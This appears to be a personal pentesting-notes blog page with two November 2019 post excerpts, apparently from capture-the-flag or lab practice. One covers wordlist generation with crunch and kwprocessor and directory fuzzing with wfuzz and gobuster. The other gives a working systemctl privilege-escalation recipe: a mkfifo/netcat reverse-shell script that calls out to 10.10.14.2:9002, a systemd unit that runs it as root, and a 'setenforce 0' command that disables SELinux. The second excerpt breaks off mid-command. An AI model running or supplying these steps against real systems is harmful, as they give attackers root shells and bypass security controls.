Skip to main content

Posts

Showing posts from November, 2019

Password Cracking

Good Post: Bruteforcing using Custom Scripts Crunch: crunch 8 8 -t Any_Characers -o list.txt if you want to create something like Bha!!123 crunch 8 8 -t ,@@^^%%% , = Upper case letter @=lower case letters ^ = special characters %= numbers Generating Wordlist using kwprocessor this is used for generating random passwords that users might use as a streak on the keyboard example: qwertyuiop[]\ git clone https://github.com/hashcat/kwprocessor.git #Create a keyword based on routes users use to create passwords ./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt Fuzzing for Webpages wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 #show all responses except 404; -s --> negative responses gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404 #Fuzzing Webpages ; -b negative responses; -k --> ignore ce

Priv Esc using SysemCTL

This can be done when you find system ctl is running as root. so we need to create my own service. that can be done by METHOD - I Create a file named test.sh in Target Machine rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f   save it as test.sh → copy the file to /home/bhanu/test.sh chmod +x test.sh    now create a new service: → save it as mys.service [Unit] Description=Example systemd service. [Service] Type=simple ExecStart=/bin/bash /home/bhanu/test.sh [Install] WantedBy=multi-user.target # Another set of Service - USE ONLY ONE SERVICE [Unit] Description=Example systemd service. [Service] Type=simple ExecStart=/bin/bash -p -c "id > /tmp/output" [Install] WantedBy=multi-user.target #if you face any issues run below 2 commands sudo setenforce 0 sudo systemctl daemon-reload #not mandatory chmod 644 /home/bhanu/mys.service # Start the Service systemctl enable /home/bhanu/mys.service #Check status i